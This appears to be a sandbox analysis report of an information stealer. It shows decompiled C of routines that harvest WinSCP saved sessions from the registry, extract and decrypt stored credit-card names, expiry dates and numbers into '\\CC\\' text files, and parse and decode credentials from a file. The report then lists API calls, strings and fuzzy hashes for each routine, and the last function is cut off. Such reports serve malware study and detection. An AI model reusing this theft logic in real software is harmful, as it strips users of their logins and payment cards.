                                                                    							_t182 = RegEnumKeyExA( *(_t224 - 0xde0),  *(_t224 - 0xde8), _t224 - 0x118, _t224 - 0xdec, 0, 0, 0, 0);
                                                                    							 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
                                                                    							_t218 = _t182;
                                                                    							E00404354(_t224 - 0xd34, 1, 0);
                                                                    						} while (_t182 != 0x103);
                                                                    						goto L31;
                                                                    					}
                                                                    					RegCloseKey( *(_t224 - 0xde0));
                                                                    					 *(_t224 - 0xde0) = 0;
                                                                    					goto L17;
                                                                    				}
                                                                    				L1:
                                                                    				 *_t199 = 0;
                                                                    				_t199 = _t199 + 1;
                                                                    				_t213 = _t213 - 1;
                                                                    				if(_t213 != 0) {
                                                                    					goto L1;
                                                                    				} else {
                                                                    					_t214 = _t125;
                                                                    					_t200 = _t224 - 0x918;
                                                                    					goto L3;
                                                                    				}
                                                                    			}




















                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00411871
                                                                    • _memset.LIBCMT ref: 00411891
                                                                    • _memset.LIBCMT ref: 004118B7
                                                                    • _memset.LIBCMT ref: 004118CE
                                                                    • _memset.LIBCMT ref: 004118E5
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,?,?), ref: 00411940
                                                                    • RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004119F5
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A56
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A78
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A92
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00411AB2
                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00411AD9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411AF3
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B05
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B12
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B24
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411B4E
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B61
                                                                    • RegGetValueA.ADVAPI32(?,?,0000FFFF,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411B97
                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BC4
                                                                    • lstrcatA.KERNEL32(:22,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BE9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BF6
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411C08
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411C32
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411C45
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?), ref: 00411C8C
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 00411C99
                                                                    • lstrcatA.KERNEL32 ref: 00411CAB
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 00411CBD
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?), ref: 00411D21
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 00411D32
                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411D66
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411D9A
                                                                      • Part of subcall function 004113E3: __EH_prolog3.LIBCMT ref: 004113FC
                                                                      • Part of subcall function 004113E3: GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411451
                                                                      • Part of subcall function 004113E3: HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 00411458
                                                                      • Part of subcall function 004113E3: GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 0041146D
                                                                      • Part of subcall function 004113E3: HeapFree.KERNEL32(00000000,?,?,00000024), ref: 00411474
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00411936
                                                                    • Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 00411AA8
                                                                    • :22, xrefs: 00411BDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Value$CloseHeap_memset$EnumOpenProcess_memmove$AllocFreeH_prolog3H_prolog3_
                                                                    • String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
                                                                    • API String ID: 3365208532-2123096617
                                                                    • Opcode ID: 68eb35987e60646b8661059df4dd610109fdd1f21b03d625ac238be56bbafd02
                                                                    • Instruction ID: 09a1173645d4c4ea0742f84c8dcd22c964316ef488497ec39e675a86579081bf
                                                                    • Opcode Fuzzy Hash: 68eb35987e60646b8661059df4dd610109fdd1f21b03d625ac238be56bbafd02
                                                                    • Instruction Fuzzy Hash: C7E12875900169AFDF21AF90DC44AEEBB79FB06344F0100EBE509A6161DB746EC8CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E0040F878(CHAR* __ecx, void* __edx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t33;
                                                                    				void* _t52;
                                                                    				char* _t66;
                                                                    				char* _t74;
                                                                    				void* _t83;
                                                                    				void* _t93;
                                                                    				void* _t94;
                                                                    				long _t95;
                                                                    				char* _t96;
                                                                    				char* _t97;
                                                                    				char* _t99;
                                                                    				char* _t100;
                                                                    				char* _t102;
                                                                    				char* _t103;
                                                                    				CHAR* _t106;
                                                                    				void* _t107;
                                                                    				void* _t108;
                                                                    				signed int _t110;
                                                                    				void* _t112;
                                                                    
                                                                    				_t93 = __edx;
                                                                    				_t110 = _t112 - 0x98;
                                                                    				_t33 =  *0x443674; // 0x393162b1
                                                                    				 *(_t110 + 0x94) = _t33 ^ _t110;
                                                                    				_push(0x446204);
                                                                    				 *(_t110 - 0x7c) =  *(_t110 + 0xa0);
                                                                    				_t106 = __ecx;
                                                                    				if(E0041EA23() < 0x20) {
                                                                    					_push(_t83);
                                                                    					E00426300(_t110 - 0x70, 0, 0x104);
                                                                    					lstrcatA(_t110 - 0x70, _t106);
                                                                    					lstrcatA(_t110 - 0x70, 0x43c8e0);
                                                                    					lstrcatA(_t110 - 0x70,  *0x4461d8);
                                                                    					_t108 = CreateFileA(_t110 - 0x70, 0x80000000, 1, 0, 3, 0, 0);
                                                                    					 *(_t110 - 0x78) = _t108;
                                                                    					_t117 = _t108;
                                                                    					if(_t108 != 0) {
                                                                    						_push(_t94);
                                                                    						SetFilePointer(_t108, 0, 0, 2);
                                                                    						_t95 = GetFileSize(_t108, 0);
                                                                    						SetFilePointer(_t108, 0, 0, 0);
                                                                    						_t11 = _t95 + 1; // 0x1
                                                                    						_t52 = E0041D05B(0, _t93, _t95, _t108, _t117, _t11);
                                                                    						 *(_t110 - 0x74) = _t52;
                                                                    						ReadFile(_t108, _t52, _t95, _t110 - 0x80, 0);
                                                                    						_t96 = StrStrA( *(_t110 - 0x74),  *0x445b80);
                                                                    						if(_t96 != 0) {
                                                                    							do {
                                                                    								_t16 =  *0x446320( *0x445b80) + 3; // 0x3
                                                                    								 *(_t110 - 0x74) = _t96 + _t16;
                                                                    								_t97 = StrStrA(_t96 + _t16,  *0x445da4);
                                                                    								 *((char*)(_t97 - 3)) = 0;
                                                                    								lstrcatA( *0x446250, 0x43c8dc);
                                                                    								lstrcatA( *0x446250,  *0x445e44);
                                                                    								lstrcatA( *0x446250,  *(_t110 - 0x7c));
                                                                    								lstrcatA( *0x446250, 0x43c8dc);
                                                                    								lstrcatA( *0x446250,  *0x446100);
                                                                    								lstrcatA( *0x446250,  *(_t110 - 0x74));
                                                                    								lstrcatA( *0x446250, 0x43c8dc);
                                                                    								_t66 = StrStrA(_t97 + 0xfffffffe,  *0x445fc0);
                                                                    								_t99 = _t66;
                                                                    								_t22 =  *0x446320( *0x445fc0) + 3; // 0x3
                                                                    								 *(_t110 - 0x74) =  &(_t99[_t22]);
                                                                    								_t100 = StrStrA( &(_t99[_t22]),  *0x445fbc);
                                                                    								 *((char*)(_t100 - 3)) = 0;
                                                                    								lstrcatA( *0x446250,  *0x445c48);
                                                                    								lstrcatA( *0x446250, E0040E3F0( *(_t110 - 0x74), _t93));
                                                                    								lstrcatA( *0x446250, 0x43c8dc);
                                                                    								_t74 = StrStrA(_t100 + 0xfffffffe,  *0x445fbc);
                                                                    								_t102 = _t74;
                                                                    								_t27 =  *0x446320( *0x445fbc) + 3; // 0x3
                                                                    								 *(_t110 - 0x74) =  &(_t102[_t27]);
                                                                    								_t103 = StrStrA( &(_t102[_t27]),  *0x446114);
                                                                    								 *((char*)(_t103 - 3)) = 0;
                                                                    								lstrcatA( *0x446250,  *0x4460c4);
                                                                    								lstrcatA( *0x446250, E0040E3F0( *(_t110 - 0x74), _t93));
                                                                    								lstrcatA( *0x446250, "\n\n");
                                                                    								_t96 = StrStrA(_t103 + 0xfffffffe,  *0x445b80);
                                                                    							} while (_t96 != 0);
                                                                    							_t108 =  *(_t110 - 0x78);
                                                                    						}
                                                                    						CloseHandle(_t108);
                                                                    						_pop(_t94);
                                                                    					}
                                                                    					_t36 =  *0x446254();
                                                                    					_pop(_t83);
                                                                    				}
                                                                    				_pop(_t107);
                                                                    				return E0041DA9B(_t36, _t83,  *(_t110 + 0x94) ^ _t110, _t93, _t94, _t107);
                                                                    			}


























                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F8C0
                                                                    • lstrcatA.KERNEL32(?,?,?,?,0043C8D8), ref: 0040F8CD
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,?,0043C8D8), ref: 0040F8DC
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F8EC
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,0043C8D8), ref: 0040F902
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,004132CB,?,?,0043C8D8), ref: 0040F91B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,0043C8D8), ref: 0040F923
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,0043C8D8), ref: 0040F92F
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0043C8D8), ref: 0040F94A
                                                                    • StrStrA.SHLWAPI(?,?,?,0043C8D8), ref: 0040F959
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040F974
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040F988
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F99A
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040F9AC
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F9BB
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F9C8
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040F9DA
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F9E9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040F9F6
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FA06
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040FA14
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040FA28
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040FA3F
                                                                      • Part of subcall function 0040E3F0: _memset.LIBCMT ref: 0040E42C
                                                                      • Part of subcall function 0040E3F0: lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E441
                                                                      • Part of subcall function 0040E3F0: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040E449
                                                                      • Part of subcall function 0040E3F0: _memmove.LIBCMT ref: 0040E4A3
                                                                    • lstrcatA.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FA54
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,0043C8D8), ref: 0040FA61
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FA71
                                                                    • lstrlen.KERNEL32(?,?,0043C8D8), ref: 0040FA7F
                                                                    • StrStrA.SHLWAPI(00000003,?,?,0043C8D8), ref: 0040FA93
                                                                    • lstrcatA.KERNEL32(?,?,0043C8D8), ref: 0040FAAA
                                                                      • Part of subcall function 0040E3F0: lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4B9
                                                                      • Part of subcall function 0040E3F0: lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4CB
                                                                    • lstrcatA.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FABF
                                                                    • lstrcatA.KERNEL32(0043EC3C,?,?,0043C8D8), ref: 0040FAD0
                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,0043C8D8), ref: 0040FAE0
                                                                    • CloseHandle.KERNEL32(00000000,?,?,0043C8D8), ref: 0040FAF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString_memmove
                                                                    • String ID:
                                                                    • API String ID: 1742400647-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E0040F094(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t59;
                                                                    				void* _t71;
                                                                    				void* _t76;
                                                                    				CHAR* _t80;
                                                                    				void* _t81;
                                                                    				CHAR* _t86;
                                                                    				CHAR* _t87;
                                                                    				CHAR* _t88;
                                                                    				void* _t100;
                                                                    				CHAR* _t101;
                                                                    				CHAR* _t125;
                                                                    				CHAR* _t128;
                                                                    				void* _t129;
                                                                    				void* _t130;
                                                                    				void* _t133;
                                                                    				void* _t134;
                                                                    				void* _t136;
                                                                    
                                                                    				_t136 = __eflags;
                                                                    				E0042083E(E0043492B, __ebx, __edi, __esi);
                                                                    				 *(_t129 - 0x248) =  *(_t129 + 8);
                                                                    				 *(_t129 - 0x244) =  *(_t129 + 0xc);
                                                                    				 *((intOrPtr*)(_t129 - 0x250)) =  *((intOrPtr*)(_t129 + 0x10));
                                                                    				 *((intOrPtr*)(_t129 - 0x258)) =  *((intOrPtr*)(_t129 + 0x14));
                                                                    				 *((intOrPtr*)(_t129 - 0x254)) =  *((intOrPtr*)(_t129 + 0x18));
                                                                    				_t107 = 0;
                                                                    				_t125 = __ecx;
                                                                    				E00426300(_t129 - 0x118, 0, 0x104);
                                                                    				lstrcatA(_t129 - 0x118,  *0x445fe0);
                                                                    				_t59 = 0x1a;
                                                                    				lstrcatA(_t129 - 0x118, E00415EF6(_t59, _t136));
                                                                    				CopyFileA(_t125, _t129 - 0x118, 1);
                                                                    				E00426300(_t129 - 0x220, 0, 0x104);
                                                                    				wsprintfA(_t129 - 0x220, "\\CC\\%s_%s.txt",  *(_t129 - 0x244),  *(_t129 - 0x248));
                                                                    				_t128 =  *0x445bf0; // 0x4c988e0
                                                                    				_t71 =  *0x446248(_t129 - 0x118, _t129 - 0x24c, 0x250);
                                                                    				_t133 = _t130 + 0x30;
                                                                    				if(_t71 == 0) {
                                                                    					_t76 =  *0x4461fc( *((intOrPtr*)(_t129 - 0x24c)), _t128, 0xffffffff, _t129 - 0x240, 0);
                                                                    					_t134 = _t133 + 0x14;
                                                                    					if(_t76 == 0) {
                                                                    						_t80 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						_t128 = _t80;
                                                                    						_t81 =  *0x446218( *((intOrPtr*)(_t129 - 0x240)));
                                                                    						_t139 = _t81 - 0x64;
                                                                    						if(_t81 == 0x64) {
                                                                    							_t125 = 0x43c8dc;
                                                                    							while(1) {
                                                                    								_t86 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), _t107);
                                                                    								_t87 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), 1);
                                                                    								 *(_t129 - 0x244) = _t87;
                                                                    								_t88 =  *0x446238( *((intOrPtr*)(_t129 - 0x240)), 2);
                                                                    								_t134 = _t134 + 0x18;
                                                                    								 *(_t129 - 0x248) = _t88;
                                                                    								lstrcatA(_t128, "Name: ");
                                                                    								lstrcatA(_t128, _t86);
                                                                    								lstrcatA(_t128, _t125);
                                                                    								lstrcatA(_t128, "Month: ");
                                                                    								lstrcatA(_t128,  *(_t129 - 0x244));
                                                                    								lstrcatA(_t128, _t125);
                                                                    								lstrcatA(_t128, "Year: ");
                                                                    								lstrcatA(_t128,  *(_t129 - 0x248));
                                                                    								lstrcatA(_t128, _t125);
                                                                    								lstrcatA(_t128, "Card: ");
                                                                    								_t100 =  *0x44622c( *((intOrPtr*)(_t129 - 0x240)), 3,  *0x446224( *((intOrPtr*)(_t129 - 0x240)), 3,  *((intOrPtr*)(_t129 - 0x250))));
                                                                    								_t107 = _t129 - 0x23c;
                                                                    								_t101 = E0040E874(_t129 - 0x23c,  *((intOrPtr*)(_t129 - 0x258)), _t100, _t125, _t128, _t139);
                                                                    								 *(_t129 - 4) =  *(_t129 - 4) & 0x00000000;
                                                                    								if(_t101[0x14] >= 0x10) {
                                                                    									_t101 =  *_t101;
                                                                    								}
                                                                    								lstrcatA(_t128, _t101);
                                                                    								 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
                                                                    								E00404354(_t129 - 0x23c, 1, 0);
                                                                    								lstrcatA(_t128, "\n\n");
                                                                    								_push( *((intOrPtr*)(_t129 - 0x240)));
                                                                    								if( *0x446218() != 0x64) {
                                                                    									goto L8;
                                                                    								}
                                                                    								_t107 = 0;
                                                                    								__eflags = 0;
                                                                    							}
                                                                    						}
                                                                    						L8:
                                                                    						E0041CE7C( *((intOrPtr*)(_t129 - 0x254)), _t129 - 0x220,  *0x446320(_t128), 3);
                                                                    					}
                                                                    					 *0x44621c( *((intOrPtr*)(_t129 - 0x240)));
                                                                    					 *0x44624c( *((intOrPtr*)(_t129 - 0x24c)));
                                                                    				}
                                                                    				DeleteFileA(_t129 - 0x118);
                                                                    				return E00420888(_t107, _t125, _t128);
                                                                    			}





















                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040F09E
                                                                    • _memset.LIBCMT ref: 0040F0E2
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F0F7
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040F10D
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F11D
                                                                    • _memset.LIBCMT ref: 0040F12C
                                                                    • wsprintfA.USER32 ref: 0040F14C
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F19F
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F1A6
                                                                    • lstrcatA.KERNEL32(00000000,Name: ), ref: 0040F20D
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F215
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F21D
                                                                    • lstrcatA.KERNEL32(00000000,Month: ), ref: 0040F229
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F236
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F23E
                                                                    • lstrcatA.KERNEL32(00000000,Year: ), ref: 0040F24A
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F257
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F25F
                                                                    • lstrcatA.KERNEL32(00000000,Card: ), ref: 0040F26B
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F2BB
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,00000001,00000000), ref: 0040F2DA
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F2F7
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F338
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AllocFileH_prolog3_Heapwsprintf$CopyCountDeleteLocalProcessTick_malloc_randlstrlen
                                                                    • String ID: Card: $Month: $Name: $Year: $\CC\%s_%s.txt
                                                                    • API String ID: 2374201135-921702500
                                                                    • Opcode ID: d9b6252a99525faf56d81f1c89531e1be0a9a5569d6b11b13fddd8b29ba23a27
                                                                    • Instruction ID: 3446a684050c226e41bd7e93b1e1de0f12db2be70c4aa8d308090059b4190f6b
                                                                    • Opcode Fuzzy Hash: d9b6252a99525faf56d81f1c89531e1be0a9a5569d6b11b13fddd8b29ba23a27
                                                                    • Instruction Fuzzy Hash: BE612176901118AFCF21AB64EC4DEDE7B78FF0A311F1100B6F609A2161DB759A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E00408CC5(CHAR* __ecx, void* __edx) {
                                                                    				signed int _v8;
                                                                    				char _v1012;
                                                                    				char _v2012;
                                                                    				char _v3012;
                                                                    				char _v4012;
                                                                    				char _v5012;
                                                                    				char _v6012;
                                                                    				char _v7012;
                                                                    				char _v8012;
                                                                    				char _v9012;
                                                                    				intOrPtr _v9016;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t74;
                                                                    				char* _t76;
                                                                    				char* _t77;
                                                                    				char* _t78;
                                                                    				char* _t79;
                                                                    				char* _t80;
                                                                    				char* _t81;
                                                                    				char* _t82;
                                                                    				char* _t83;
                                                                    				char* _t84;
                                                                    				signed char _t144;
                                                                    				signed char _t146;
                                                                    				char* _t147;
                                                                    				char* _t148;
                                                                    				char* _t149;
                                                                    				char* _t150;
                                                                    				char* _t151;
                                                                    				char* _t152;
                                                                    				char* _t153;
                                                                    				char* _t154;
                                                                    				char* _t155;
                                                                    				void* _t165;
                                                                    				void* _t166;
                                                                    				void* _t167;
                                                                    				void* _t168;
                                                                    				void* _t169;
                                                                    				void* _t170;
                                                                    				void* _t171;
                                                                    				void* _t172;
                                                                    				void* _t173;
                                                                    				void* _t174;
                                                                    				void* _t175;
                                                                    				void* _t176;
                                                                    				void* _t177;
                                                                    				void* _t178;
                                                                    				void* _t179;
                                                                    				void* _t180;
                                                                    				void* _t181;
                                                                    				char* _t184;
                                                                    				char* _t186;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    				intOrPtr _t191;
                                                                    				signed int _t192;
                                                                    				void* _t193;
                                                                    				char* _t194;
                                                                    				char* _t196;
                                                                    
                                                                    				_t188 = __edx;
                                                                    				E0042E300(0x2334);
                                                                    				_t74 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t74 ^ _t192;
                                                                    				_t189 = 0x3e8;
                                                                    				_t163 = __ecx;
                                                                    				_t165 = 0x3e8;
                                                                    				_t76 =  &_v7012;
                                                                    				do {
                                                                    					 *_t76 = 0;
                                                                    					_t76 = _t76 + 1;
                                                                    					_t165 = _t165 - 1;
                                                                    				} while (_t165 != 0);
                                                                    				_t166 = 0x3e8;
                                                                    				_t77 =  &_v5012;
                                                                    				do {
                                                                    					 *_t77 = 0;
                                                                    					_t77 = _t77 + 1;
                                                                    					_t166 = _t166 - 1;
                                                                    				} while (_t166 != 0);
                                                                    				_t167 = 0x3e8;
                                                                    				_t78 =  &_v6012;
                                                                    				do {
                                                                    					 *_t78 = 0;
                                                                    					_t78 = _t78 + 1;
                                                                    					_t167 = _t167 - 1;
                                                                    				} while (_t167 != 0);
                                                                    				_t168 = 0x3e8;
                                                                    				_t79 =  &_v8012;
                                                                    				do {
                                                                    					 *_t79 = 0;
                                                                    					_t79 = _t79 + 1;
                                                                    					_t168 = _t168 - 1;
                                                                    				} while (_t168 != 0);
                                                                    				_t169 = 0x3e8;
                                                                    				_t80 =  &_v9012;
                                                                    				do {
                                                                    					 *_t80 = 0;
                                                                    					_t80 = _t80 + 1;
                                                                    					_t169 = _t169 - 1;
                                                                    				} while (_t169 != 0);
                                                                    				_t170 = 0x3e8;
                                                                    				_t81 =  &_v1012;
                                                                    				do {
                                                                    					 *_t81 = 0;
                                                                    					_t81 = _t81 + 1;
                                                                    					_t170 = _t170 - 1;
                                                                    				} while (_t170 != 0);
                                                                    				_t171 = 0x3e8;
                                                                    				_t82 =  &_v3012;
                                                                    				do {
                                                                    					 *_t82 = 0;
                                                                    					_t82 = _t82 + 1;
                                                                    					_t171 = _t171 - 1;
                                                                    				} while (_t171 != 0);
                                                                    				_t172 = 0x3e8;
                                                                    				_t83 =  &_v2012;
                                                                    				do {
                                                                    					 *_t83 = 0;
                                                                    					_t83 = _t83 + 1;
                                                                    					_t172 = _t172 - 1;
                                                                    				} while (_t172 != 0);
                                                                    				_t173 = 0x3e8;
                                                                    				_t84 =  &_v4012;
                                                                    				do {
                                                                    					 *_t84 = 0;
                                                                    					_t84 = _t84 + 1;
                                                                    					_t173 = _t173 - 1;
                                                                    				} while (_t173 != 0);
                                                                    				lstrcatA( &_v7012,  *0x446118);
                                                                    				lstrcatA( &_v5012,  *0x445cf8);
                                                                    				lstrcatA( &_v6012,  *0x445f98);
                                                                    				lstrcatA( &_v8012,  *0x445a8c);
                                                                    				lstrcatA( &_v9012,  *0x445ea0);
                                                                    				lstrcatA( &_v1012, _t163);
                                                                    				lstrcatA( &_v1012, 0x43c8e0);
                                                                    				lstrcatA( &_v1012,  &_v5012);
                                                                    				lstrcatA( &_v1012, 0x43c8e0);
                                                                    				lstrcatA( &_v1012,  &_v6012);
                                                                    				lstrcatA( &_v1012, 0x43c8e0);
                                                                    				lstrcatA( &_v1012,  &_v8012);
                                                                    				lstrcatA( &_v3012, _t163);
                                                                    				lstrcatA( &_v3012, 0x43c8e0);
                                                                    				lstrcatA( &_v3012,  &_v5012);
                                                                    				lstrcatA( &_v3012, 0x43c8e0);
                                                                    				lstrcatA( &_v3012,  &_v6012);
                                                                    				lstrcatA( &_v2012, _t163);
                                                                    				lstrcatA( &_v2012, 0x43c8e0);
                                                                    				lstrcatA( &_v2012,  &_v9012);
                                                                    				lstrcatA( &_v2012, 0x43c8e0);
                                                                    				lstrcatA( &_v2012,  &_v8012);
                                                                    				lstrcatA( &_v4012, _t163);
                                                                    				lstrcatA( &_v4012, 0x43c8e0);
                                                                    				lstrcatA( &_v4012,  &_v9012);
                                                                    				_t144 = GetFileAttributesA( &_v1012);
                                                                    				_t191 = 0xf;
                                                                    				if(_t144 != 0xffffffff && (_t144 & 0x00000010) == 0) {
                                                                    					_t196 = _t193 - 0x1c;
                                                                    					_t186 = _t196;
